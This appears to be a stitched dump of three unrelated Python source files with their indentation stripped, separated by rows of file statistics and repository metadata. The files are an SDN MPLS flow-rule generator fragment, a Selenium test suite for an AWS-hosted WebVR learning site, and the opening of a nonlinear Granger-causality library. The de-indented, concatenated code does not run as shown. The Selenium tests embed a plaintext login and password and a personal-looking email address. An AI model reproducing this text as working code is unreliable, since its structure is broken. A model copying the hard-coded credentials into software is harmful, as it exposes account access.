for i in range(1,(n*3+1),3):
src = i
dst = i+1
mid = i+2
x1 = f"""flow{k} = {{
'switch':"00:00:00:00:00:00:00:0{src}",
"name":"flow_mod_{k}",
"eth_type":"0x0800",
"ipv4_src":"10.0.0.0{src}",
"ipv4_dst":"10.0.0.0{dst}",
"priority":"32768",
"in_port":"1",
"ip_tos":"1",
"active":"true",
"actions":"push_mpls=0x8847,set_field=mpls_label->{k},output={dst}"
}}"""
k+=1
x2 = f"""flow{k} = {{
'switch':"00:00:00:00:00:00:00:0{src}",
"name":"flow_mod_{k}",
"eth_type":"0x0800",
"ipv4_src":"10.0.0.0{src}",
"ipv4_dst":"10.0.0.0{dst}",
"priority":"32768",
"in_port":"1",
"ip_tos":"2",
"active":"true",
"actions":"push_mpls=0x8847,set_field=mpls_label->{k},output={mid}"
}}"""
k+=1
x3 = f"""flow{k} = {{
'switch':"00:00:00:00:00:00:00:0{mid}",
"name":"flow_mod_{k}",
"eth_type":"0x8847",
"priority":"32768",
"in_port":"{dst}",
"mpls_label":"{k-1}",
"active":"true",
"actions":"set_field=mpls_label->{k},output={mid}"
}}"""
k+=1
x4 = f"""flow{k} = {{
'switch':"00:00:00:00:00:00:00:0{dst}",
"name":"flow_mod_{k}",
"eth_type":"0x8847",
"priority":"32768",
"in_port":"{dst}",
"mpls_label":"{k-3}",
"active":"true",
"actions":"pop_mpls=0x0800,output=1"
}}"""
k+=1
x5 = f"""flow{k} = {{
'switch':"00:00:00:00:00:00:00:0{dst}",
"name":"flow_mod_{k}",
"eth_type":"0x8847",
"priority":"32768",
"in_port":"{mid}",
"mpls_label":"{k-2}",
"active":"true",
"actions":"pop_mpls=0x0800,output=1"
}}"""
k+=1
print(x1)
print(x2)
print(x3)
print(x4)
print(x5)
for i in range(1, 5*n+1):
print(f"pusher.set(flow{i})")
| 18.673469 | 71 | 0.489617 | 286 | 1,830 | 2.996504 | 0.178322 | 0.140023 | 0.175029 | 0.186698 | 0.829638 | 0.801634 | 0.801634 | 0.801634 | 0.801634 | 0.76196 | 0 | 0.145597 | 0.230601 | 1,830 | 97 | 72 | 18.865979 | 0.463068 | 0.00929 | 0 | 0.611111 | 0 | 0.069444 | 0.817329 | 0.403974 | 0 | 0 | 0.029801 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
15c9e0a047527ebc9f1794efdb58543500fbb211 | 24,644 | py | Python | unittests/vaeative_unit.py | keshav154/VeativeWebVR | ff60cb0fcd1ace41ce4914904f89a5367dbba93e | [
"MIT"
] | null | null | null | unittests/vaeative_unit.py | keshav154/VeativeWebVR | ff60cb0fcd1ace41ce4914904f89a5367dbba93e | [
"MIT"
] | null | null | null | unittests/vaeative_unit.py | keshav154/VeativeWebVR | ff60cb0fcd1ace41ce4914904f89a5367dbba93e | [
"MIT"
] | 5 | 2019-08-19T00:52:18.000Z | 2020-03-04T10:11:33.000Z | import unittest
from selenium import webdriver
from selenium.webdriver.support.select import Select
import HtmlTestRunner
from selenium.webdriver.support.ui import WebDriverWait
from time import sleep
import xmlrunner
class Test(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
cls.driver.get('file:///D:/Santhosh/VeativeWebVR/Structure_of_Phenol/login.html')
cls.driver.implicitly_wait(10)
def test_login_form_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
print("logged in successfully")
return 0
def test_signup_tag_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginbtn = '//a[contains(text(),\'Login\')]'
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
return 0
def test_signup_form_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginbtn = '//a[contains(text(),\'Login\')]'
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
signupurl = '//a[contains(text(),\'Sign Up\')]'
full_name = '//input[@id=\'FULL_NAME\']'
email_id = '//input[@id=\'EMAIL_ID\']'
username = '//input[@id=\'USER_NAME\']'
passwd = '//input[@id=\'USER_PASSWORD\']'
age = '//input[@id=\'USER_AGE\']'
gender = '//select[@id=\'USER_GENDER\']'
signup_btn = '//input[@id=\'userSignUpFrm-btn\']'
captura = '//img[@id=\'captcha-image\']'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(signupurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(full_name))
user_element.send_keys("sanjeev amar")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(email_id))
passwd_element.send_keys("sanjeev.amar@gmail.com")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
btn_element.send_keys("amarnath123")
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
loginelement.send_keys("sanjeev123")
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(age))
user_element.send_keys("24")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(gender))
passwd_element.send_keys("male")
sign_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(signup_btn))
sign_element.click()
return 0
print("signup in successfully")
def test_componet_lineandplain_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms300035/')
self.driver.implicitly_wait(20)
return 0
def test_componet_structurePhonel_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ss200049/')
self.driver.implicitly_wait(20)
return 0
def test_componet_complexNumbers_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs300012/')
self.driver.implicitly_wait(20)
return 0
def test_componet_Reproduct_part_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms100027/')
self.driver.implicitly_wait(20)
return 0
def test_componet_OpaqueT_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs400052/')
self.driver.implicitly_wait(20)
return 0
def test_componet_series_parallel_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs400034/')
self.driver.implicitly_wait(20)
return 0
def test_componet_atomic_model_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs200040/')
self.driver.implicitly_wait(20)
return 0
def test_componet_Galv_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs400060/')
self.driver.implicitly_wait(20)
return 0
def test_componet_Dominent_recessive_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms100176/')
self.driver.implicitly_wait(20)
return 0
def test_componet_lines_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms300045/')
self.driver.implicitly_wait(20)
return 0
def test_componet_dot_structure_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/hs200069/')
self.driver.implicitly_wait(20)
return 0
def test_componet_Humun_brain_validations(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/')
self.driver.implicitly_wait(10)
loginurl = '//a[contains(text(),\'Login\')]'
username = '//input[@id=\'unicef_username\']'
passwd = '//input[@id=\'unicef_password\']'
loginbtn = '//input[@id=\'login-btn\']'
clicable = '//div[contains(text(),\'In phenol, hydroxy functional group is directly at\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginurl))
loginelement.click()
user_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(username))
user_element.send_keys("sanjeev")
passwd_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(passwd))
passwd_element.send_keys("admin1234")
btn_element = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(loginbtn))
btn_element.click()
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms100057/')
self.driver.implicitly_wait(20)
return 0
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/WebVR/Aframe/ms300035/')
self.driver.implicitly_wait(20)
return 0
def test_impact_analysis_launch(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/report')
self.driver.implicitly_wait(10)
print("impact analysis logged successfully..")
def test_impact_analysis_AI(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/report')
self.driver.implicitly_wait(10)
activity_path = '//a[contains(text(),\'Activity Information\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(activity_path))
loginelement.click()
def test_impact_analysis_socre_by_module(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/report')
self.driver.implicitly_wait(10)
activity_path = '//a[contains(text(),\'Score By Module\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(activity_path))
loginelement.click()
def test_impact_analysis_module_attempted(self):
self.driver = webdriver.Chrome(executable_path="C:\chromedriver_win32\chromedriver.exe")
self.driver.get('http://ec2-52-5-117-32.compute-1.amazonaws.com/unicef/public/report')
self.driver.implicitly_wait(10)
activity_path = '//a[contains(text(),\'Modules Attempted\')]'
loginelement = WebDriverWait(self.driver,10).until(lambda driver:self.driver.find_element_by_xpath(activity_path))
loginelement.click()
# @classmethod
# def tearDownClass(cls):
# cls.driver.close()
# cls.driver.quit()
# print("Test completed..!!")
if __name__ == "__main__":
# unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output='example_dir'))
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='test_result')) | 58.536817 | 122 | 0.690351 | 3,031 | 24,644 | 5.43418 | 0.056747 | 0.137211 | 0.090766 | 0.098658 | 0.914577 | 0.908749 | 0.908749 | 0.906745 | 0.906745 | 0.906745 | 0 | 0.035751 | 0.164624 | 24,644 | 421 | 123 | 58.536817 | 0.764317 | 0.00775 | 0 | 0.789916 | 0 | 0.089636 | 0.211069 | 0.082382 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056022 | false | 0.12605 | 0.019608 | 0 | 0.123249 | 0.008403 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
15ff4b2570ab90fd49ddcebc0bbfe47a2b1041b1 | 131,234 | py | Python | nonlincausality/nonlincausality.py | mrosol/Nonlincausality | 1a46215b575134f11bc9870c32bd523084a4ce81 | [
"MIT"
] | 11 | 2021-02-15T22:51:40.000Z | 2022-03-17T23:10:35.000Z | nonlincausality/nonlincausality.py | mrosol/nonlincausality | 1a46215b575134f11bc9870c32bd523084a4ce81 | [
"MIT"
] | 1 | 2021-12-01T17:43:32.000Z | 2021-12-04T14:38:21.000Z | nonlincausality/nonlincausality.py | mrosol/nonlincausality | 1a46215b575134f11bc9870c32bd523084a4ce81 | [
"MIT"
] | 3 | 2021-08-06T19:11:28.000Z | 2022-02-26T18:24:01.000Z | # -*- coding: utf-8 -*-
"""
@author: MSc. Maciej Rosoł
contact: mrosol5@gmail.com
Version 1.0.3
Update: 15.02.2021
"""
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats as stats
import math
import statistics
import keras
from keras import Sequential
from keras.layers import Dense, LSTM, Dropout, GRU, TimeDistributed, Flatten
from statsmodels.tsa.arima.model import ARIMA
import tensorflow as tf
'''
This package contains two types of functions.
The first type is an implementation of a modified Granger causality test based on grangercausalitytests function from statsmodels.tsa.stattools.
As a Granger causality test is using linear regression for prediction it may not capture more complex causality relations.
The first type of presented functions are using nonlinear forecasting methods (using recurrent neural networks or ARMIAX models) for prediction instead of linear regression.
For each tested lag this function is creating 2 models. The first one is forecasting the present value of X based on n=current lag past values of X,
while the second model is forecasting the same value based on n=current lag past values of X and Y time series.
If the prediction error of the second model is statistically significantly smaller than the error of the first model than it means that Y is G-causing X (Y->X).
It is also possible to test conditional causality using those functions.
The functions based on neural networks can test the causality on the given test set.
The first type of function contains: nonlincausalityLSTM(), nonlincausalityGRU(), nonlincausalityNN() and nonlincausalityARIMAX().
The second type of functions is for measuring the change of causality during time.
Those functions are using first type functions to create the forecasting models.
They calculate the measure of the causality in a given time window 'w1' with a given step 'w2'.
The measure of change of the causality during time is the sigmoid function of quotient of errors - 2/(1 + exp(-((RMSE_X/RMSE_XY)-1)))-1.
Also the measure of the causality of the whole signal was applied as the logarithm of quotient of variances of errors - ln(var(error_X)/var(error_XY)).
Those functions can operate with multiple time series and test causal relations for each pair of signals.
The second type of function contains: nonlincausalitymeasureLSTM(), nonlincausalitymeasureGRU(), nonlincausalitymeasureNN() and nonlincausalitymeasureARIMAX().
'''
#%% LSTM
def nonlincausalityLSTM(x, maxlag, LSTM_layers, LSTM_neurons, run=1, Dense_layers=0, Dense_neurons=[], xtest=[], z=[], ztest=[], add_Dropout=True, Dropout_rate=0.1, epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose=True, plot=False):
'''
This function is implementation of modified Granger causality test. Granger causality is using linear autoregression for testing causality.
In this function forecasting is made using LSTM neural network.
Used model architecture:
1st LSTM layer -> (Droput) -> ... -> (1st Dense layer) -> (Dropout) -> Output Dense layer
*() - not obligatory
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series. The second column is the variable, that may cause the variable in the first column.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
LSTM_layers - int, number of LSTM layers in the model.
LSTM_neurons - list, tuple or numpy.ndarray, where the number of elements should be equal to the number of LSTM layers specified in LSTM_layers.
The first LSTM layer has the number of neurons equal to the first element in LSTM_neurns,
the second layer has the number of neurons equal to the second element in LSTM_neurons and so on.
run - int, determines how many times a given neural network architecture will be trained to select the model that has found the best minimum of the cost function
Dense_layers - int, number of Dense layers, besides the last one, which is the output layer.
Dense_neurons - list, tuple or numpy.ndarray, where the number of elements should be equal to the number of Dense layers specified in Dense_layers.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing hypothesis.
add_Dropout - boolean, if True, than Dropout layer is added after each LSTM and Dense layer, besides the output layer.
Dropout_rate - float, parameter 'rate' for Dropout layer.
epochs_num - int or list, number of epochs used for fitting the model. If list, then the length should be equal to number of different learning rates used
learning_rate - float or list, the applied learning rate for the training process. If list, then the length should be equal to the lenth of epochs_num list.
batch_size_num - int, number of batch size for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
Returns
-------
results - dictionary, where the number of used lags is keys. Each key stores a list, which contains test results, models for prediction of X fitted only on X time series,
models for prediction of X fitted on X and Y time series, history of fitting the first model, history of fitting the second model, RSS of models based only on X, RSS of models based on X and Y,
index of the best model based on X, index of the best model based on X and Y, errors from the best model based on X, errors from the best model based on X and Y
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] !=2:
raise Exception('x should have 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be a positive integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be grater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking if the number of LSTM layers is correct
if type(LSTM_layers) is not int:
